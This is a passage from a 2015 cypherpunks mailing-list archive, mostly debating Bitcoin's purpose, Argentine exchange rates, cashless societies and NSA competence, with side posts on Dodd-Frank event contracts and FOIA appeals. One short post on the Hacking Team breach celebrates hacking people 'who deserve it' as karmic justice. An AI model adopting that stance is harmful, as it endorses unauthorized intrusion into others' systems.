~10 pesos = 1 dollar. If you buy stuff > using an international credit card, you get the 10:1 exchange rate. > > > Finally there's the real or black market exchange rate at ~13.5 > pesos = 1 dollar. > > So, some people can buy btc (or, say, pay travel expenses abroad) > using the 10:1 rate. The benefit you get doesn't really come from > btc but from the distortions created by govt. By the way, the > subsidy is, of course, financed with more inflation. And yes, the > poorest people here are subsidizing people who travel to > disneyland. > > If on the other hand you want to buy btc in a local exchange the > price you will be asked in pesos is something like the price at > bitstamp multiplied by the $:US$ black market exchange rate. > > https://www.unisend.com/ > > I'm seeing 1 btc = 3800 pesos. And 1 btc = us$ 265. So, that gives > a price of 14.3 pesos per dollar (hm - even more expensive than > black market) > > > > --------- > > I think there's a service here that allows you to pay utility > bills using btc. I'm not sure what's the point because they > (obviously) charge fees so you end up paying more than if you used > pesos directly. I guess it's handy for people who already had btc > but I doubt that number of people is significant. > > > --------- > > > And then there are a few bars and stores that accept btc, in > argentina's capital (~10 million population). Where I live > (rosario) I don't think there's a single store that accepts btc. > > > --------- > > > Now, there probably are people who use btc to move money in and out > of the country although btc's exchange risk and spread arent't > small. > > I know that if you want to move fiat accross borders using black > market services, doing so isn't too expensive. So btc has to face > efficient competitioni in that area. > > >> I'm definitely interested in your insights on this, since I've >> never visited a country that was experiencing rampant inflation, >> unless you count the US in the late '70s, about the time I was >> entering grade school. > > > There was hyperinflation in argentina in 1989-90 - I was 19 at that > time and I don't really recall much of what happened in everyday > life. I know the prices of stuff in the supermarket changed each > day but I didn't pay much attention. I wasn't really interested in > political economy at that time. > > Then after that 1990 'crisis', the peso was pegged 1:1 to the > dollar for ~10 years, until 2001 when the gov't defaulted and the > banking system blew up. > > Since 2001, the a$/us$ rate went from 1:1 to 13:1 and you can use > that as a relatively good proxy for inflation, although > interestingly, the prices of things like food are at something like > 20:1, prolly reflecting both the inflation of the peso AND the > dollar, plus the fact that the local economy is a fucking mess ran > by fucking protectionists. > > Anyway, the current inflation rate, by argentine standards, isn't > too high, as crazy as that may sound. > > Usually the government cycles in argentina last 10 years or less, > but these shitbags are somehow still clinging to power. > > > >> I think you overestimate the government's ability to exert >> control, something many of the participants in this list have >> devoted their lives to reducing. It's the whole point of Bitcoin, >> so it seems like you're basically just saying "Bitcoin will fail >> at its mission and instead just get coopted by the powers that >> be." > > > Yes, that is what I'm saying. Furthermore, I think that is already > happening. > > https://blog.xapo.com/announcing-xapos-advisory-board/ > > >> Or maybe you think that Bitcoin is just a reckless toy created by >> greedy first worlders? > > > No. I don't consider it a toy. I don't know how robust (or > scalable...) it actually is (apart from hashing power haha), but > it's not a toy. > > As to motivations, I always assumed that the cypherpunk bunch was > composed of *at least* anarchists, although what I see in this list > is a sizable amount of self-parody (dan geer and accomplices for > instance). > > > However, the bitcoin phenomenom is complex, there's a lot of people > involed the vast majority of whom I don't know at all, so I can't > hardly known their motivations. Greed can certainly play a part > here. > > (and notice that absent government we wouldn't need something like > bitcoin to protect us from government attacks) > > > > > >> >>>> they're not going to have a choice. Cryptocurrencies don't >>>> have to be legal to be disruptive. >>> >>> And yet there seems to be a fair amount of people in the >>> bitcoin 'community' who are quite eager (or desperate) to have >>> bitcoin 'regulated' so that it becomes 'respectable', >>> 'legal'...and usable. >>> >> >> Indeed, something I have repeatedly ranted against. So far the >> regulation has not had much impact on Bitcoin itself. No legally >> "tainted" or "whitelisted" coins yet. > > > True. Regulation hasn't affected the technical/protocol side of > bitcoin. > > Since you mention so called colored coins, wasn't that an idea of > that guy mike hearn, ex member of the google mafia? You think that > kind of people are to be trusted? <---rhetorical question... > > The thing is, regulation will affect how bitcoin is used, and > that's not necessarily related to any technical issue. Whether > you'll need 20 licenses to use bitcoin, or none. That kind of > thing. > > > > >> > >> >> Perhaps, but that actually seems to be the crux of what we're >> arguing about here, and of many arguments on this list. What are >> the actual capabilities of the adversary? You don't want to >> underestimate, but at the same time, if you overestimate, you may >> miss a potential solution. > > > Maybe. Or you waste some resources. > > But if the actions of government were relatively easy to counter I > think we would be looking at a political system rather different > from the one that exists now. > > >> Some are probably living as hermits because they think they're >> being monitored and/or given cancer by the smart meter mesh >> network. Personally, I tend to doubt that the government's >> capabilities significantly exceed what's available to the >> general public, except in terms of the money they're able to >> bring to bear, > > Yeah, well. That might make a little difference, perhaps? =P > > But actually, the main issue is not even that they have access to > lots of resources. What makes the difference is > > 1) guns 2) willingess to use them 3) better organization* > > > *military organization - it doesn't matter if even the majority of > government bureaucrats cant put 2 and 2 together. > > > >> which is blunted somewhat by the extreme inefficiency of >> government contracting/spending/operations/etc. > > > You know, I'm rather familiar with libertarian theory if that's > where you're coming from. I don't think that the fact that > government organization in some areas is inefficient means > anything. > > Government is (very) efficient at its core criminal businesses. > > >> >> A "litmus test" issue might be whether you think the NSA's >> expressed surprise over Snowden's leaks was genuine. I tend to >> think it was, and that his documents are genuine. > > Which documents? =) The very few that have been published? =) > (....) > > Yes, they may be genuine, but surely you realize that we don't have > access to the vast majority of them. You think that's because of > government incompetence...? > > > >> I see no reason for the NSA to be substantially more competent >> than, say, the OPM. They're each large organizations with no >> bottom line that attract people of flexible moral character who >> are attracted to power and/or job security. > > > Yes. So, they are good in those two areas, especially in the > wielding of power. > > >> I don't think those traits tend to lead to effective >> organizations, as much as a number of Hollywood movies would like >> us to believe. > > I don't really watch hollywood movies =P. > > And I don't think hollywood movies mention this kind of thing > > https://en.wikipedia.org/wiki/United_States_incarceration_rate > > Do you think a government that efficiently kidnaps millions of its > own subjects for fun and profit is not an exceedinly efficient > criminal organization? > > >> >> A kind of fun book on the OTHER side of the spectrum from what I >> believe about government's capabilities is Daniel Suarez's book >> Influx, about a government agency tasked with keeping >> technologies out of the hands of the public. > > > I don't think they necessarily have any magical secret weapon. They > don't really need them anyway. All they need is ordinary lead > bullets. > > >> I think you'd need a pretty substantial head start before >> technological advantages can overcome organizational and general >> human disadvantages, though. I.e. leaks, infiltration, etc. > > See above... > > (ufff - sorry about the really long message) > > > J. > > > > > > - -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQEcBAEBAgAGBQJVnJ6UAAoJEGxwq/inSG8CLFIH/12h4KF4FsAUsMghqHHc4Btl diGlICkENXCkTpvPCh7VOM91C8JWJOFfxsndrvRfQFMQJ284wBqjdhIXvPUhWJ/s s1varQdC1N9vPdLn2ga4Hi7JcZioEhKKTAS+DvXCQYcGs2y0ZNG86l8kcVYdIVUC R7IPCjNLK1KAyxjBA/ghPlA2V6a888U41OcVxJ9ok3vTauTMweY+ociAFu/YNdHa Z/PLf0uus1Tqg+UFvgCoKVMhzdhzARItZ+6dgiZCCQr413QPyHbbVO84kCrAqx8L rpxEROieU4ZTSrCac3KGLwSQ9Dw+B0xwe3QdLxR7U705mkItCn513FCCbbrcKec= =YJSO -----END PGP SIGNATURE----- From softservant at gmail.com Tue Jul 7 21:39:41 2015 From: softservant at gmail.com (Softy) Date: Tue, 7 Jul 2015 21:39:41 -0700 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] Message-ID: > From: Lodewijk andré de la porte > To: Sean Lynch > Cc: "cypherpunks at cpunks.org" > > > his documents are genuine. I see no reason for the NSA to be > substantially > > more competent than, say, the OPM. > > > There's absolutely no reason to think the NSA doesn't have a > layered/multi-cell operation wherein a mere contractor is not given access > to nation-essential secrets. If there's a foreign spy you want him to > ​They do have such a layer system. The problem is the fluidity of the people. Soldiers become Contractors become Government Employees become Contractors ad​-infinitum. Once cleared, the system has not managed to remain opaque from within. In times past it was -- and that successful model was condemned as having "not prevented" the Sept 2001 bombing. Thus the stovepipe security model was banished; "war effort" requires exorbitant high staffing increases which led to inevitable, and predictable lowering of tactics, techniques and procedures. That trend has since reversed (I would argue pre-Snowden) and the beast is once again slowly shrouding itself within and increasingly outward. As with any good Corporate makeover, with a kinder gentler face. [[ my removal of your excellent government employee summary is not because of any disagreement - whether military or civilian employee, the vast majority are of a mind you described. But, as has been eloquently stated Power Corrupts Absolutely. ]] > shows a certain amount of rot in NSA_Public. The recent Trident leak shows > > '​NSA_Public' is an excellent​ ​characterization. That which we know of the Agency will forever be shadowed by it's hidden complexities. Having exposed a portion of one small stovepipe, the tubing now changes and reworks itself hiding the un-discerned exposed parts, and more closely guarding the vast un-exposed bulk. ​I use my description of "small" ​completely intentional. The scale of the "Snowden Topics" is minor compared to the remaining unknowns. Carefully protected within the 'NSA_Closed'. Not only by the regrowing stovepipes, but as well by the people you aptly described as genuinely, legitimately, and correctly striving to maintain the integrity of the beast. Just as they don't understand the oppositions claims aptly describing the illegitimacy of the beast, neither will the opposition. Sadly the two are closer in philosophical agreement than either realize. And probably won't without the benefit of hindsight, whatever sort of post-empirical change allows for the creation of a commonly agreed on framework of reference. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4808 bytes Desc: not available URL: From dan at geer.org Tue Jul 7 19:06:28 2015 From: dan at geer.org (dan at geer.org) Date: Tue, 07 Jul 2015 22:06:28 -0400 Subject: Jim Bell vindicated In-Reply-To: Your message of "Mon, 04 May 2015 21:32:25 -0700." Message-ID: <20150708020628.3E0502280B6@palinka.tinho.net> Dodd-Frank, 7 U.S.C. 7a-2(c)(5)(C) (C) Special rule for review and approval of event contracts and swaps contracts (i) Event contracts In connection with the listing of agreements, contracts, transactions, or swaps in excluded commodities that are based upon the occurrence, extent of an occurrence, or contingency (other than a change in the price, rate, value, or levels of a commodity described in section 1a(2)(i)2 of this title), by a designated contract market or swap execution facility, the Commission may determine that such agreements, contracts, or transactions are contrary to the public interest if the agreements, contracts, or transactions involve -- (I) activity that is unlawful under any Federal or State law; (II) terrorism; (III) assassination; (IV) war; (V) gaming; or (VI) other similar activity determined by the Commission, by rule or regulation, to be contrary to the public interest. (ii) Prohibition No agreement, contract, or transaction determined by the Commission to be contrary to the public interest under clause (i) may be listed or made available for clearing or trading on or through a registered entity. From seanl at literati.org Tue Jul 7 15:27:01 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 07 Jul 2015 22:27:01 +0000 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: On Tue, Jul 7, 2015 at 3:02 PM Juan wrote: > On Tue, 7 Jul 2015 15:21:50 -0400 > grarpamp wrote: > > > > Creating a system in which a Botswanan can give a few bits > > of their impoverished wages to their friend in Mumbai > > > What? Bitcoin exists so that rich people in western countries > especially the US can become even richer. So far it worked > pretty well. > Really? What rich person has gotten richer through Bitcoin so far? Remittances seem like the biggest use of Bitcoin at the moment. Sure, there's plenty of speculation, but your claim that Bitcoin's purpose is to make the rich richer is also speculation. And FUD. > Bitcoin hasn't led to any meaningful political/economic > change yet, apart from possibly triggering the demise of > government cash, which would be a complete disaster. Talk about > 'unintended consequences' (unintended?) > I can't imagine you've read a single thing written by the people who influenced the creation of Bitcoin if you think that the collapse of fiat currencies is an unintended consequence. Any fiat currency that is so bad that its users prefer to use Bitcoin deserves to collapse. Of course, so far, while Bitcoin has become popular in places like Argentina and Venezuela, the US dollar remains by far the more popular alternative currency in those places. And if Greece exits the Euro and starts printing Drachmas there, they will have to worry about people trading their Drachmas for Euros, not for Bitcoin. > A likely scenario exists in which there wouldn't be any > independent crypto-currency. There would be fully 'traceable' > electronic currencies controlled as always by the state and the > banking mafia. > By what evidence do you estimate that this is a "likely" scenario? You may be right that many nation-states and banks will be loathe to accept an untraceable and uncontrollable crypto-currency, but that's the whole point; they're not going to have a choice. Cryptocurrencies don't have to be legal to be disruptive. The main problem that they've run up against before now is the lack of healthy underground markets to take advantage of them. Given time, governments' and banks' opinions and policies about cryptocurrencies will become irrelevant. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3139 bytes Desc: not available URL: From seanl at literati.org Tue Jul 7 15:53:36 2015 From: seanl at literati.org (Sean Lynch) Date: Tue, 07 Jul 2015 22:53:36 +0000 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> Message-ID: On Tue, Jul 7, 2015 at 3:50 PM Lodewijk andré de la porte wrote: > 2015-07-08 7:27 GMT+09:00 Sean Lynch : > >> What? Bitcoin exists so that rich people in western countries >>> especially the US can become even richer. So far it worked >>> pretty well. >>> >> >> Really? What rich person has gotten richer through Bitcoin so far? >> Remittances seem like the biggest use of Bitcoin at the moment. Sure, >> there's plenty of speculation, but your claim that Bitcoin's purpose is to >> make the rich richer is also speculation. And FUD. >> > > Yours would the Uncertainty and Doubt, I see. > > Bitcoin is cold hard money - therefore benefiting those that can exploit > it best. The most capital you have, the better you can exploit it. > Therefore, the wealthy stand more to benefit from Bitcoin than anyone else. > Any other effect would indicate softness of Bitcoin or some human issue. It > does prevent (certain forms of) suppression; it's very hard to censor > financial transactions on the Bitcoin network. It also provides a great > deal of financial and administrative utility to all in similar quantity, it > levels the playing field of the poor/rich somewhat. > Perhaps my response was a bit hyperbolic, but that is a very different claim than "Bitcoin exists so that rich people in western countries especially the US can become even richer." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2220 bytes Desc: not available URL: From juan.g71 at gmail.com Tue Jul 7 20:07:12 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 8 Jul 2015 00:07:12 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> Message-ID: <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> On Wed, 08 Jul 2015 00:08:40 +0000 Sean Lynch wrote: > > This is not what most people mean when they say "rich get richer." > They're talking about 1%ers or whatever. In any case, you still seem > to be making unfounded claims about the intent behind Bitcoin, Let's say I was being cynical =) > when > we have statements of intent in the creator's own words. I know. "A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution." (Come to think of it, I wouldn't say btc is cash, but that's yet another philosophical discussion) > Many believe > Satoshi is also rich, Bitcoin-wise, but we don't even know for sure > that they have the key to the account or that they will ever spend > that Bitcoin. Personally, I hope they do. The creator of Bitcoin > deserves to be rewarded. > Yes. Anyway, grarpamp comment sounded to me like "We're doing it for the poor children of africa" which struck me as somewhat hollow. But nevermind, I'll drop the subject. > My apologies. I was confused by your use of the phrase "government > cash." Government cash is fiat, but not all fiat is cash. But the > cashless societies already being proposed and implemented are fully > centralized and much easier to trace than Bitcoin, because they > require bank accounts with their concomitant "know your customer" > regulations. Bitcoin doesn't make this situation worse, True. My comment or observation is that bitcoin may have catalyzed the move towards a cashless society. Whether a cpunk-like currency will be used, or a goldman-sachs-like currency will be used remains to be seen, I think. But so be it I guess. If governments are forced to show their true totalitarian colors to an even larger extent than they do now, there will be some good in that. > and by > enabling other applications on top of it, including untraceable > e-cash, will only make it better. > I pledge the "wait and see" amendment =P I hope you're right. > > Can you elaborate? Does your use of quotes around the word "popular" > indicate sarcasm? My understanding was that a number of merchants had > started using a payment system that used dollars from foreign credit > cards to buy Bitcoin so that they did not have to accept the > government-imposed exchange rate. Actually, there are some people who use credit cards to buy btc (or other stuff abroad) using a government subsidized exchange rate. The are a couple of official exchange rates. One is set at ~8 pesos = 1 dollar. The other is at ~10 pesos = 1 dollar. If you buy stuff using an international credit card, you get the 10:1 exchange rate. Finally there's the real or black market exchange rate at ~13.5 pesos = 1 dollar. So, some people can buy btc (or, say, pay travel expenses abroad) using the 10:1 rate. The benefit you get doesn't really come from btc but from the distortions created by govt. By the way, the subsidy is, of course, financed with more inflation. And yes, the poorest people here are subsidizing people who travel to disneyland. If on the other hand you want to buy btc in a local exchange the price you will be asked in pesos is something like the price at bitstamp multiplied by the $:US$ black market exchange rate. https://www.unisend.com/ I'm seeing 1 btc = 3800 pesos. And 1 btc = us$ 265. So, that gives a price of 14.3 pesos per dollar (hm - even more expensive than black market) --------- I think there's a service here that allows you to pay utility bills using btc. I'm not sure what's the point because they (obviously) charge fees so you end up paying more than if you used pesos directly. I guess it's handy for people who already had btc but I doubt that number of people is significant. --------- And then there are a few bars and stores that accept btc, in argentina's capital (~10 million population). Where I live (rosario) I don't think there's a single store that accepts btc. --------- Now, there probably are people who use btc to move money in and out of the country although btc's exchange risk and spread arent't small. I know that if you want to move fiat accross borders using black market services, doing so isn't too expensive. So btc has to face efficient competitioni in that area. > I'm definitely interested in your > insights on this, since I've never visited a country that was > experiencing rampant inflation, unless you count the US in the late > '70s, about the time I was entering grade school. There was hyperinflation in argentina in 1989-90 - I was 19 at that time and I don't really recall much of what happened in everyday life. I know the prices of stuff in the supermarket changed each day but I didn't pay much attention. I wasn't really interested in political economy at that time. Then after that 1990 'crisis', the peso was pegged 1:1 to the dollar for ~10 years, until 2001 when the gov't defaulted and the banking system blew up. Since 2001, the a$/us$ rate went from 1:1 to 13:1 and you can use that as a relatively good proxy for inflation, although interestingly, the prices of things like food are at something like 20:1, prolly reflecting both the inflation of the peso AND the dollar, plus the fact that the local economy is a fucking mess ran by fucking protectionists. Anyway, the current inflation rate, by argentine standards, isn't too high, as crazy as that may sound. Usually the government cycles in argentina last 10 years or less, but these shitbags are somehow still clinging to power. > I think you overestimate the government's ability to exert control, > something many of the participants in this list have devoted their > lives to reducing. It's the whole point of Bitcoin, so it seems like > you're basically just saying "Bitcoin will fail at its mission and > instead just get coopted by the powers that be." Yes, that is what I'm saying. Furthermore, I think that is already happening. https://blog.xapo.com/announcing-xapos-advisory-board/ > Or maybe you think > that Bitcoin is just a reckless toy created by greedy first worlders? No. I don't consider it a toy. I don't know how robust (or scalable...) it actually is (apart from hashing power haha), but it's not a toy. As to motivations, I always assumed that the cypherpunk bunch was composed of *at least* anarchists, although what I see in this list is a sizable amount of self-parody (dan geer and accomplices for instance). However, the bitcoin phenomenom is complex, there's a lot of people involed the vast majority of whom I don't know at all, so I can't hardly known their motivations. Greed can certainly play a part here. (and notice that absent government we wouldn't need something like bitcoin to protect us from government attacks) > > > > they're not going to have a choice. Cryptocurrencies > > > don't have to be legal to be disruptive. > > > > And yet there seems to be a fair amount of people in the > > bitcoin 'community' who are quite eager (or desperate) to have > > bitcoin 'regulated' so that it becomes 'respectable', 'legal'...and > > usable. > > > > Indeed, something I have repeatedly ranted against. So far the > regulation has not had much impact on Bitcoin itself. No legally > "tainted" or "whitelisted" coins yet. True. Regulation hasn't affected the technical/protocol side of bitcoin. Since you mention so called colored coins, wasn't that an idea of that guy mike hearn, ex member of the google mafia? You think that kind of people are to be trusted? <---rhetorical question... The thing is, regulation will affect how bitcoin is used, and that's not necessarily related to any technical issue. Whether you'll need 20 licenses to use bitcoin, or none. That kind of thing. > > > Perhaps, but that actually seems to be the crux of what we're arguing > about here, and of many arguments on this list. What are the actual > capabilities of the adversary? You don't want to underestimate, but > at the same time, if you overestimate, you may miss a potential > solution. Maybe. Or you waste some resources. But if the actions of government were relatively easy to counter I think we would be looking at a political system rather different from the one that exists now. >Some are probably living as hermits because they think > they're being monitored and/or given cancer by the smart meter mesh > network. Personally, I tend to doubt that the government's > capabilities significantly exceed what's available to the general > public, except in terms of the money they're able to bring to bear, Yeah, well. That might make a little difference, perhaps? =P But actually, the main issue is not even that they have access to lots of resources. What makes the difference is 1) guns 2) willingess to use them 3) better organization* *military organization - it doesn't matter if even the majority of government bureaucrats cant put 2 and 2 together. > which is blunted somewhat by the extreme inefficiency of government > contracting/spending/operations/etc. You know, I'm rather familiar with libertarian theory if that's where you're coming from. I don't think that the fact that government organization in some areas is inefficient means anything. Government is (very) efficient at its core criminal businesses. > > A "litmus test" issue might be whether you think the NSA's expressed > surprise over Snowden's leaks was genuine. I tend to think it was, > and that his documents are genuine. Which documents? =) The very few that have been published? =) (....) Yes, they may be genuine, but surely you realize that we don't have access to the vast majority of them. You think that's because of government incompetence...? >I see no reason for the NSA to be > substantially more competent than, say, the OPM. They're each large > organizations with no bottom line that attract people of flexible > moral character who are attracted to power and/or job security. Yes. So, they are good in those two areas, especially in the wielding of power. > I > don't think those traits tend to lead to effective organizations, as > much as a number of Hollywood movies would like us to believe. I don't really watch hollywood movies =P. And I don't think hollywood movies mention this kind of thing https://en.wikipedia.org/wiki/United_States_incarceration_rate Do you think a government that efficiently kidnaps millions of its own subjects for fun and profit is not an exceedinly efficient criminal organization? > > A kind of fun book on the OTHER side of the spectrum from what I > believe about government's capabilities is Daniel Suarez's book > Influx, about a government agency tasked with keeping technologies > out of the hands of the public. I don't think they necessarily have any magical secret weapon. They don't really need them anyway. All they need is ordinary lead bullets. > I think you'd need a pretty > substantial head start before technological advantages can overcome > organizational and general human disadvantages, though. I.e. leaks, > infiltration, etc. See above... (ufff - sorry about the really long message) J. From seanl at literati.org Tue Jul 7 17:08:40 2015 From: seanl at literati.org (Sean Lynch) Date: Wed, 08 Jul 2015 00:08:40 +0000 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559c5f23.c328370a.7776d.1c71@mx.google.com> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> Message-ID: On Tue, Jul 7, 2015 at 4:27 PM Juan wrote: > > It seems kinda obvious that virtually all bitcoin developers > and users *in the west* are richer than people in Africa and > India. > > That's what I was getting at. Bitcoin devs - *already > rich by 'third world' standards* - are richer now. Millionaires > even (notice that grarpamp was talking about impoverished > wages...and people) > This is not what most people mean when they say "rich get richer." They're talking about 1%ers or whatever. In any case, you still seem to be making unfounded claims about the intent behind Bitcoin, when we have statements of intent in the creator's own words. Many believe Satoshi is also rich, Bitcoin-wise, but we don't even know for sure that they have the key to the account or that they will ever spend that Bitcoin. Personally, I hope they do. The creator of Bitcoin deserves to be rewarded. > > > > > Remittances seem like the biggest use of Bitcoin at the moment. Sure, > > there's plenty of speculation, but your claim that Bitcoin's purpose > > is to make the rich richer is also speculation. And FUD. > > > So what amount of btc is being used to make payments between > Botswana and Mumbai? > No real way of knowing. I only have anecdotal evidence. > > What amount of btc is being used to speculate/gamble in a few > big, centralized and fully NSA-AML-monitored exchanges? > Probably a lot. But that's true of cash as well. > > > > > > > Bitcoin hasn't led to any meaningful political/economic > > > change yet, apart from possibly triggering the demise of > > > government cash, which would be a complete disaster. Talk > > > about 'unintended consequences' (unintended?) > > > > > > > I can't imagine you've read a single thing written by the people who > > influenced the creation of Bitcoin if you think that the collapse of > > fiat currencies is an unintended consequence. > > > But I said *cash* not fiat. And the collapse of relatively > untraceable *cash* is *bad*. > > What we may end up with is FIAT currencies and NO CASH > option* for those fiat currencies. Bad. Pretty bad. > My apologies. I was confused by your use of the phrase "government cash." Government cash is fiat, but not all fiat is cash. But the cashless societies already being proposed and implemented are fully centralized and much easier to trace than Bitcoin, because they require bank accounts with their concomitant "know your customer" regulations. Bitcoin doesn't make this situation worse, and by enabling other applications on top of it, including untraceable e-cash, will only make it better. > > > *aka credit cards. > > > > Any fiat currency that > > is so bad that its users prefer to use Bitcoin deserves to collapse. > > Of course, so far, while Bitcoin has become popular in places like > > Argentina > > Do you know where I live? Of course you don't have to know > where I live. But you'll know it in a second anyway. I live in > argentina - and let me tell you, bitcoin isnt exactly 'popular' > here. > Can you elaborate? Does your use of quotes around the word "popular" indicate sarcasm? My understanding was that a number of merchants had started using a payment system that used dollars from foreign credit cards to buy Bitcoin so that they did not have to accept the government-imposed exchange rate. I'm definitely interested in your insights on this, since I've never visited a country that was experiencing rampant inflation, unless you count the US in the late '70s, about the time I was entering grade school. > > and Venezuela, the US dollar remains by far the more > > popular alternative currency in those places. > > Yep, that's quite correct as far as argentina goes. I suspect > it's true regarding venezuela as well. > > > And if Greece exits the > > Euro and starts printing Drachmas there, they will have to worry > > about people trading their Drachmas for Euros, not for Bitcoin. > > > > A likely scenario exists in which there wouldn't be any > > > independent crypto-currency. There would be fully > > > 'traceable' electronic currencies controlled as always by the state > > > and the banking mafia. > > > > > > > By what evidence do you estimate that this is a "likely" scenario? > > > The evidence is called 'history'. That, and the nature of > government and its business 'partners' - or accomplices. > I think you overestimate the government's ability to exert control, something many of the participants in this list have devoted their lives to reducing. It's the whole point of Bitcoin, so it seems like you're basically just saying "Bitcoin will fail at its mission and instead just get coopted by the powers that be." Or maybe you think that Bitcoin is just a reckless toy created by greedy first worlders? > > > You may be right that many nation-states and banks will be loathe to > > accept an untraceable and uncontrollable crypto-currency, but that's > > the whole point; > > You seem to be assuming that an uncontrollable and untraceable > crypto-currency exist? I'm not seeing anything of the sort. > It depends on what you mean by "exist." The people on this list have created several. It seems like a major reason that none of them has taken off has been the need for trusted third parties, something that can be reduced or eliminated through the use of the blockchain, if not Bitcoin itself. Bitcoin could, for example, be used as a clearing currency between various Chaumian e-cash issuers, the same way gold used to be used as the international clearing currency until Bretton Woods. > > they're not going to have a choice. Cryptocurrencies > > don't have to be legal to be disruptive. > > And yet there seems to be a fair amount of people in the bitcoin > 'community' who are quite eager (or desperate) to have bitcoin > 'regulated' so that it becomes 'respectable', 'legal'...and > usable. > Indeed, something I have repeatedly ranted against. So far the regulation has not had much impact on Bitcoin itself. No legally "tainted" or "whitelisted" coins yet. > Of course, this isn't a shortcoming that only affects btc. > Anything that the government 'outlaws' becomes harder to > transact. > I'm not even sure what form outlawing Bitcoin would take in the US. I suppose they could try to define mining or even running a full client as operating a payment service. But that would take some backtracking after all the regulatory efforts. Which may be a reason I should not be ranting against regulation; it hamstring's government's ability to completely outlaw it later. > > > The main problem that > > they've run up against before now is the lack of healthy underground > > markets to take advantage of them. Given time, governments' and > > banks' opinions and policies about cryptocurrencies will become > > irrelevant. > > > I do wish that was actually the case, but I think that view > doesn't fully take into account the capabilities of the > 'enemy'. > Perhaps, but that actually seems to be the crux of what we're arguing about here, and of many arguments on this list. What are the actual capabilities of the adversary? You don't want to underestimate, but at the same time, if you overestimate, you may miss a potential solution. Some are probably living as hermits because they think they're being monitored and/or given cancer by the smart meter mesh network. Personally, I tend to doubt that the government's capabilities significantly exceed what's available to the general public, except in terms of the money they're able to bring to bear, which is blunted somewhat by the extreme inefficiency of government contracting/spending/operations/etc. A "litmus test" issue might be whether you think the NSA's expressed surprise over Snowden's leaks was genuine. I tend to think it was, and that his documents are genuine. I see no reason for the NSA to be substantially more competent than, say, the OPM. They're each large organizations with no bottom line that attract people of flexible moral character who are attracted to power and/or job security. I don't think those traits tend to lead to effective organizations, as much as a number of Hollywood movies would like us to believe. A kind of fun book on the OTHER side of the spectrum from what I believe about government's capabilities is Daniel Suarez's book Influx, about a government agency tasked with keeping technologies out of the hands of the public. I think you'd need a pretty substantial head start before technological advantages can overcome organizational and general human disadvantages, though. I.e. leaks, infiltration, etc. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 11633 bytes Desc: not available URL: From coderman at gmail.com Wed Jul 8 00:38:59 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 00:38:59 -0700 Subject: Hacking Team has been hacked (hard) In-Reply-To: <559C4E88.4050506@riseup.net> References: <5599F683.40200@gna.org> <559C4E88.4050506@riseup.net> Message-ID: On 7/7/15, Razer wrote: > ... and to hopefully inform and inspire you to go out and hack shit. let me tell you what: hacking fucks who deserve it is the best feeling in life :) it's karmic justice upon those who always felt above the law. die happy tomorrow level satisfaction! [from experience, i say this] From coderman at gmail.com Wed Jul 8 00:50:40 2015 From: coderman at gmail.com (coderman) Date: Wed, 8 Jul 2015 00:50:40 -0700 Subject: Inquiry re. how to handle Glomar reply to FOIA request In-Reply-To: <559C8626.9070504@riseup.net> References: <559C8626.9070504@riseup.net> Message-ID: On 7/7/15, odinn wrote: > ... > The NSA failed to respond within the 20 business days required by > federal law and sent back a "Glomar response." Technically, as of > today, I only have 49 days left to write and send an appeal (based on > the date when they sent me their Glomar reply). this is par for the FOIA course, of course. > if you have ever done a SUCCESSful appeal of a Glomar response, please > reply back to me and let me know (give me some advice, etc). Thanks > in advance. two things: 1) there is a list, FOI-L at listserv.syr.edu where this might find more useful responses. 2) muckrock.com - they handle re-submission to follow up on late responses, and it's all automagic. > I've copied a portion of the letter they sent below: > > "As you may also be aware, ... this is waaaay too wordy. one thing i've learned, is to keep any request as short, and laser guided as possible. some agencies will find whatever excuse they can to deny a request, and if one element of your query falls into the deny bin they'll send the whole thing back or deny outright as "unreasonable". good luck! From juan.g71 at gmail.com Tue Jul 7 21:33:33 2015 From: juan.g71 at gmail.com (Juan) Date: Wed, 8 Jul 2015 01:33:33 -0300 Subject: Bitcoin philosophical musings and pressures 7 years in [drifted from: txrate, forking, etc] In-Reply-To: <559C9E94.8010603@riseup.net> References: <559c4b24.d6a48c0a.a6394.0140@mx.google.com> <559c5f23.c328370a.7776d.1c71@mx.google.com> <559c93ca.656b8c0a.4ba8.2f81@mx.google.com> <559C9E94.8010603@riseup.net> Message-ID: <559ca80a.e40f370a.1ccb2.17c7@mx.google.com> On Tue, 07 Jul 2015 20:52:52 -0700 odinn wrote: > Satoshi was > apparently thinking about that same issue, of a decentralized market > within bitcoin, but it just didn't get finished. > > And in February of 2010, it was stripped out of bitcoin. > > (Insert ripping sound here.) > > https://github.com/bitcoin/bitcoin/commit/5253d1ab77fab1995ede03fb934edd > 67f1359ba8 > > Go OpenBazaar, etc. They (and some other similar projects) are > carrying the torch of decentralized marketplaces that don't require > legacy institutions to operate. Thanks. I wasn't aware that the decentralized marketplace problem was being worked on at that time and by Satoshi. Interesting. J. From jdb10987 at yahoo.com Tue Jul 7 19:51:27 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 8 Jul 2015 